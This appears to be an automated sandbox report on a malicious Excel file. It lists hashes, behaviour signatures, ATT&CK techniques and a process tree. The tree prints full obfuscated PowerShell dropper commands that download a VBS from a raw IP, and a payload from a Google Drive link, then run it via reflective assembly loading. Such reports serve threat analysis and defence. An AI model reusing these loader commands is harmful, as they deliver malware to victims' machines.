35423879af97aa746f2c25ba204b152e8eb36a45bd2e9cadfd9c77fe39ef1604

Analysis

max time kernel
121s
max time network
125s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
04-11-2024 15:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Document.xla.xls
Size

937KB
MD5

3f507483c69122665749c74957fecbcf
SHA1

8fa0278a58eb2262edf9d5109653ab6225c4d030
SHA256

35423879af97aa746f2c25ba204b152e8eb36a45bd2e9cadfd9c77fe39ef1604
SHA512

a784545263e79b128fda617020b39eb7558b08821c5906fe02b76a009d6911e71081ace9f0f32af6bfbd160a99afb8ab106bfe6fe270587f9585d3189b6d32f3
SSDEEP

12288:6UXN9WeWy3aJwFNk3Zjy5dbHsu6KGsWmDYaut1Zp3tFtSGj8ahHS/yyy:DusaGFNkpyYu67sNDNw1JFtSELQ/yyy

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

exe.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

Signatures

Blocklisted process makes network request 5 IoCs

flow	pid	Process
10	2936	mshta.exe
11	2936	mshta.exe
13	2552	POWErShelL.eXE
15	2196	powershell.exe
17	2196	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2860	powershell.exe
2196	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
2552	POWErShelL.eXE
1096	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
14	drive.google.com
15	drive.google.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	POWErShelL.eXE
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	POWErShelL.eXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
624	WScript.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2976	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2552	POWErShelL.eXE
1096	powershell.exe
2552	POWErShelL.eXE
2552	POWErShelL.eXE
2860	powershell.exe
2196	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2552	POWErShelL.eXE
Token: SeDebugPrivilege	1096	powershell.exe
Token: SeDebugPrivilege	2860	powershell.exe
Token: SeDebugPrivilege	2196	powershell.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2976	EXCEL.EXE
2976	EXCEL.EXE
2976	EXCEL.EXE
2976	EXCEL.EXE
2976	EXCEL.EXE

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2936 wrote to memory of 2552	2936	mshta.exe	33
PID 2936 wrote to memory of 2552	2936	mshta.exe	33
PID 2936 wrote to memory of 2552	2936	mshta.exe	33
PID 2936 wrote to memory of 2552	2936	mshta.exe	33
PID 2552 wrote to memory of 1096	2552	POWErShelL.eXE	35
PID 2552 wrote to memory of 1096	2552	POWErShelL.eXE	35
PID 2552 wrote to memory of 1096	2552	POWErShelL.eXE	35
PID 2552 wrote to memory of 1096	2552	POWErShelL.eXE	35
PID 2552 wrote to memory of 2600	2552	POWErShelL.eXE	36
PID 2552 wrote to memory of 2600	2552	POWErShelL.eXE	36
PID 2552 wrote to memory of 2600	2552	POWErShelL.eXE	36
PID 2552 wrote to memory of 2600	2552	POWErShelL.eXE	36
PID 2600 wrote to memory of 2396	2600	csc.exe	37
PID 2600 wrote to memory of 2396	2600	csc.exe	37
PID 2600 wrote to memory of 2396	2600	csc.exe	37
PID 2600 wrote to memory of 2396	2600	csc.exe	37
PID 2552 wrote to memory of 624	2552	POWErShelL.eXE	39
PID 2552 wrote to memory of 624	2552	POWErShelL.eXE	39
PID 2552 wrote to memory of 624	2552	POWErShelL.eXE	39
PID 2552 wrote to memory of 624	2552	POWErShelL.eXE	39
PID 624 wrote to memory of 2860	624	WScript.exe	40
PID 624 wrote to memory of 2860	624	WScript.exe	40
PID 624 wrote to memory of 2860	624	WScript.exe	40
PID 624 wrote to memory of 2860	624	WScript.exe	40
PID 2860 wrote to memory of 2196	2860	powershell.exe	42
PID 2860 wrote to memory of 2196	2860	powershell.exe	42
PID 2860 wrote to memory of 2196	2860	powershell.exe	42
PID 2860 wrote to memory of 2196	2860	powershell.exe	42

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Document.xla.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2976

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2936
- C:\Windows\SysWOW64\wiNDOWSPOweRsHElL\V1.0\POWErShelL.eXE
  "C:\Windows\sySTEm32\wiNDOWSPOweRsHElL\V1.0\POWErShelL.eXE" "pOwERShELL -ex BYPASS -NoP -W 1 -C DEVIcECrEdenTIAldEPLOyment.eXe ; Iex($(IEX('[SysTeM.TeXt.EnCodInG]'+[CHAR]0x3a+[ChaR]58+'utf8.GetsTRInG([SYsTEm.COnVERT]'+[CHAr]0X3A+[cHaR]58+'FROMBase64StRinG('+[CHar]34+'JHBlQ01pYiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1CRXJEZWZpbmlUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRabHJ6SUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgakxvVG5MV2xCbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKc3VDVEJRRix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTEtSU3lTeixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHc20pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtemp4RkIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBKRG9KUUJ4a29vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRwZUNNaWI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMTE3LjkxLjI2LzM0L2tlZXBpbmd0aGViZXN0dGhpZ25zd2l0aGV2ZXJ5ZGF5Zm9ybWVnaXZlbWViZXN0LnRJRiIsIiRlTlY6QVBQREFUQVxrZWVwaW5ndGhlYmVzdHRoaWduc3dpdGhldmVyeWRheWZvcm1lZ2l2ZS52YnMiLDAsMCk7U1RhcnQtU2xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGtlZXBpbmd0aGViZXN0dGhpZ25zd2l0aGV2ZXJ5ZGF5Zm9ybWVnaXZlLnZicyI='+[CHAr]34+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2552
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYPASS -NoP -W 1 -C DEVIcECrEdenTIAldEPLOyment.eXe
    3⤵
    - Evasion via Device Credential Deployment
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1096
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ulfynccu.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2600
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDCF8.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDCF7.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2396
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\keepingthebestthignswitheverydayformegive.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious use of WriteProcessMemory
    PID:624
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICR2ZVJiT3NFcFJFRmVyZW5jRS5UT1NUUkluZygpWzEsM10rJ1gnLUpPaW4nJykoICgnWHBMaW1hZ2VVcmwgPSBSJysnZVRodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFVeUhxd3JuWENsS0JKM2o2M0xsMXQyU3RWZ0d4YlN0MCBSZVQ7WHBMd2ViQ2wnKydpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtYcExpbWFnZUJ5dGVzID0nKycgJysnWHBMd2ViQ2xpZW50LkRvd25sb2FkRGF0YShYcExpbWFnZVVybCcrJyk7WHBMaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHInKydpbmcoWHBMaW1hZ2VCeXRlcyk7WHBMc3RhcnRGbGFnID0gUmVUPDxCQVNFNjQnKydfU1RBUlQ+PlJlVCcrJztYcExlbmQnKydGbGFnJysnID0gUmVUPDxCQVNFNjRfRU5EPj5SZVQ7WHBMc3RhcnRJbmRleCA9IFhwTGltYWdlVGV4dC5JbmRleE9mKFhwTHN0YXJ0RmxhZyk7WHBMZW5kSW5kZXggPSBYcExpbWFnZVRleHQuSW5kZXhPZihYcExlbmQnKydGbCcrJ2FnKTtYcExzdGFydEluZGV4IC1nZSAwIC1hbmQgWHBMZW5kSW4nKydkZXggLWd0IFhwTHN0JysnYXJ0SW5kZXg7WHBMc3RhcnRJbmRleCArPSBYcExzdGEnKydydEZsYWcuTGVuZ3RoO1hwTCcrJ2JhcycrJ2U2NExlbmd0aCA9IFhwTGVuZEluZGV4IC0gWHBMc3RhcnRJbmRleDtYcExiYXNlNjRDb21tYW5kID0gWHBMaW1hZ2VUZScrJ3h0LlN1YnN0cmluZyhYcExzdGFydEluZGV4LCBYcExiYXNlNjRMZW5ndGgpO1hwTGJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFhwTGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoJysnKSBSWXMgRm9yRWFjaC1PYmplY3QgeyBYcExfJysnIH0pWy0xLi4tKFhwTGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07WHBMY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5DbycrJ252ZXJ0XTo6RnJvbUInKydhc2U2NFN0cmluZyhYcExiYXNlNjRSZXZlcnNlZCk7WHBMbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCcrJ1hwJysnTGNvbW1hbmRCeXRlcyk7WHBMdmFpJysnTWV0aG9kID0gW2RubGliLklPLkhvbWUnKyddLkcnKydldCcrJ01ldGhvZChSZVRWQScrJ0lSZVQpO1hwTHZhaU1ldGhvZCcrJy5JbnZva2UoWHBMbicrJ3VsbCwgQChSZVR0eHQuRkdIUkVXLzQzLzYyLjE5LjcxMS41ODEvLzpwdHRoUmVULCBSZVQnKydkZXNhdGl2YWRvUmVULCBSZVRkZXNhdGl2YWRvUmVULCBSZVRkZXNhdGl2YWRvUmVULCBSZVRhJysnc3BuZXRfcmVnYnJvd3NlcnMnKydSZVQsIFJlVGRlc2F0aXZhZG9SZVQsIFJlVGRlc2F0aXZhZG9SZVQnKycsUmVUZGVzYXRpdmFkb1JlVCxSZVRkZXNhdGl2YWRvUmVUJysnLFJlVGRlc2F0aXZhZG9SZVQsUmVUZGUnKydzYXRpdicrJ2Fkb1JlVCxSZVRkZXNhdGl2YWRvUmVULFJlVDFSZVQsUmVUZGVzYXRpdmFkb1JlVCkpOycpLlJlcExBY0UoJ1hwTCcsJyQnKS5SZXBMQWNFKChbQ0hhUl04MitbQ0hhUl0xMDErW0NIYVJdODQpLFtTdFJpTmddW0NIYVJdMzkpLlJlcExBY0UoJ1JZcycsJ3wnKSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2860
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $veRbOsEpREFerencE.TOSTRIng()[1,3]+'X'-JOin'')( ('XpLimageUrl = R'+'eThttps://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0 ReT;XpLwebCl'+'ient = New-Object System.Net.WebClient;XpLimageBytes ='+' '+'XpLwebClient.DownloadData(XpLimageUrl'+');XpLimageText = [System.Text.Encoding]::UTF8.GetStr'+'ing(XpLimageBytes);XpLstartFlag = ReT<<BASE64'+'_START>>ReT'+';XpLend'+'Flag'+' = ReT<<BASE64_END>>ReT;XpLstartIndex = XpLimageText.IndexOf(XpLstartFlag);XpLendIndex = XpLimageText.IndexOf(XpLend'+'Fl'+'ag);XpLstartIndex -ge 0 -and XpLendIn'+'dex -gt XpLst'+'artIndex;XpLstartIndex += XpLsta'+'rtFlag.Length;XpL'+'bas'+'e64Length = XpLendIndex - XpLstartIndex;XpLbase64Command = XpLimageTe'+'xt.Substring(XpLstartIndex, XpLbase64Length);XpLbase64Reversed = -join (XpLbase64Command.ToCharArray('+') RYs ForEach-Object { XpL_'+' })[-1..-(XpLbase64Command.Length)];XpLcommandBytes = [System.Co'+'nvert]::FromB'+'ase64String(XpLbase64Reversed);XpLloadedAssembly = [System.Reflection.Assembly]::Load('+'Xp'+'LcommandBytes);XpLvai'+'Method = [dnlib.IO.Home'+'].G'+'et'+'Method(ReTVA'+'IReT);XpLvaiMethod'+'.Invoke(XpLn'+'ull, @(ReTtxt.FGHREW/43/62.19.711.581//:ptthReT, ReT'+'desativadoReT, ReTdesativadoReT, ReTdesativadoReT, ReTa'+'spnet_regbrowsers'+'ReT, ReTdesativadoReT, ReTdesativadoReT'+',ReTdesativadoReT,ReTdesativadoReT'+',ReTdesativadoReT,ReTde'+'sativ'+'adoReT,ReTdesativadoReT,ReT1ReT,ReTdesativadoReT));').RepLAcE('XpL','$').RepLAcE(([CHaR]82+[CHaR]101+[CHaR]84),[StRiNg][CHaR]39).RepLAcE('RYs','|') )"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2196

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
67e486b2f148a3fca863728242b6273e

SHA1
452a84c183d7ea5b7c015b597e94af8eef66d44a

SHA256
facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb

SHA512
d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
d701be7115a9d1ca845bb978cc390d25

SHA1
b94acbc460edda3976218aa2b1e63d21ba497764

SHA256
46fefacef03e5a49d2c92c086f56f2a93d2cf40622589bb7c9c6923acf084729

SHA512
ca5e021c6c95794ef1f851afef00ad1aba2abaf27e74d9909988f87b60840baf3742e7e4c3d11e12f33295b7c36dfd0d627130f72d03e5b1e97babdb5bc44561

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
b3db56630f3ea42a75c4ebf3e5aa8c6b

SHA1
457231fa64b6af945d74312ee4c94249494e1706

SHA256
33f51f9690999c620d042cc48b30f555d544df951adf9528e71dc4ffe0ba3880

SHA512
c61d5aa8f0e5d19046da85ce70b422d7a6583ca4647414c6bd13436359383d50a53ca6ae9d4c3d2436257a1b1b900612476da5f146203c4a27ef96a0e4cff111

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UQFHO95Z\greatthignswithnewworkingskillwithmegreatwithe[1].hta

Filesize
8KB

MD5
3d79aea3c24bfb5938d3980aa7dd0641

SHA1
378d1d755f5dfed9e29b0a82c7312734c920d636

SHA256
5d5c657c4489e0ff596ece9108cfeb6c19811104abdb72c2390827e764e0c9cf

SHA512
a84de833e2e533ed9b1e4e1a102ff98c3ffa3ef428a066dc73fd71a6c45bb365e21601ac947f505c00e01bb8ca4d4f8f15506497bd70a90a1a079bfa37d731a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabD411.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESDCF8.tmp

Filesize
1KB

MD5
cd2ebf930d981b8e96b972d7749dbb4b

SHA1
be9b7e0defa2d850119a8a9733d5c1c2bb1861f6

SHA256
ee7dae80c196e0e34571bba46eaf17b16028565fdce788770cff04d6602fa460

SHA512
74fedbcaa674e020fc6402a8634cd4ea841f3075b3d319ad2d0522e33e9415e1498589ad79a779a302fa0acdf31d5c412e01c2320f9325213237609b4487d513

Download Submit
C:\Users\Admin\AppData\Local\Temp\ulfynccu.dll

Filesize
3KB

MD5
a7847f72797dcf88fa75602c0e90d44d

SHA1
215be1b6b96d21791fbf71a23e6d3dff1e246afd

SHA256
3510f8030d2c233dc05036c1968eed693c1ccbcb62b471d02ac8782c9d8adc23

SHA512
84ca580c0a90f47262d23ff99bb7dfee58402cffbd90ea3b9d912e8a62f7ab32f5ab9ad6b7758dd0362786f62f83bf3353f77740dd9e113b328bb69668e84896

Download Submit
C:\Users\Admin\AppData\Local\Temp\ulfynccu.pdb

Filesize
7KB

MD5
0ad7896c431bcd3c4a36b2ffc2a0f405

SHA1
895180600f86d8e7a7045abed50c7cc3fe941e76

SHA256
8ff7467e933144400f671dc5ddfb2c969402e8369b825d918ef4281960304005

SHA512
fff74e180943f77d252fe71aa5f92820fdd37a32c48c4fbac05aa55d16e63fea0465ccb45678cacc1e3d0fc7378fef47667eef5407ccd650e6a77f8d5f92fd67

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
ac55b928f2165efb66aa569a9df82056

SHA1
2a88dbb1ea4373ce49c8285434cd1a50dfb0b41f

SHA256
24d9600edb12feeae2c168ae61701a5e3c2c97c630958784a7803fd4995959ac

SHA512
431bce24cda9a5a635b975545b58ac3b61bcb9fce42bb1b846dd62ee3c4e5713b054df17829003d8a2535d7ff9537a6ccab063053e6bbb3199994ee4a538e838

Download Submit
C:\Users\Admin\AppData\Roaming\keepingthebestthignswitheverydayformegive.vbs

Filesize
138KB

MD5
b729b552369829e529fff9c7e9d6eeed

SHA1
9a26f8cb35676faf4f4367176b96702603e4eb61

SHA256
b4a293396eef3278e1b9b928a8696febd60b0f1b97182c4690898a99f58d9905

SHA512
55be4989d542b43a31ebda1e262455cb0441a92a18abc661d969db628b34d8cc7f7b507bd17fd0f13f56a01b127ee379301677c54710477c3f460d18372bbec8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCDCF7.tmp

Filesize
652B

MD5
157f62a2f37455774f95522e26bf4771

SHA1
d66aadb9a3b39da25386e0e58a32c0989b9e308d

SHA256
ceb64e8b3431bfff793117b736583d42a06f9eb373d9ff715e30562219d90cbf

SHA512
f948186c31ad6e15a6de9b16f664b35fcd21b73c8be05ae888ac550ca054879292faef26c15a847c3053f257e0163370b9de0942986de19f2b511cedcdf3ad49

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ulfynccu.0.cs

Filesize
485B

MD5
e5f3b9e070669d2d0b803681a097aa68

SHA1
6dbe6a9a852ab30edd02ff6ddcfcab209cde8486

SHA256
41fa74e70d8cc21fd4a69cb6f53e7109ec73881c01804eccfe45524f9e254ec9

SHA512
5860fa087ce460e9fbeacd3e42237edaee0dc1176e9283c6f5aea2e2549ed16a28c123f36d09e805bef346280a4f881ac667d6bcd02db82a8279118ec53ae73f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ulfynccu.cmdline

Filesize
309B

MD5
c65406015a17b2ccc2d6c9a30f609dc3

SHA1
61e8c6eaf1ef03c2ff9d54f20053293fac189a5a

SHA256
08ff11088d26f149fb3692634f5f46263e1af01820309bfcf3697787d1ff6d01

SHA512
cbe33e4a502c022e505aa19cc3cedebd14ab6eb9120e8286a735eb5009296536c10a49e7b330f8694c29087400ab12f1136f2f15f02d633c0747f34e9b35427d

Download Submit
memory/2936-16-0x00000000028C0000-0x00000000028C2000-memory.dmp

Filesize
8KB

Download
memory/2976-1-0x00000000724CD000-0x00000000724D8000-memory.dmp

Filesize
44KB

Download
memory/2976-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2976-60-0x00000000724CD000-0x00000000724D8000-memory.dmp

Filesize
44KB

Download
memory/2976-17-0x0000000002430000-0x0000000002432000-memory.dmp

Filesize
8KB

Download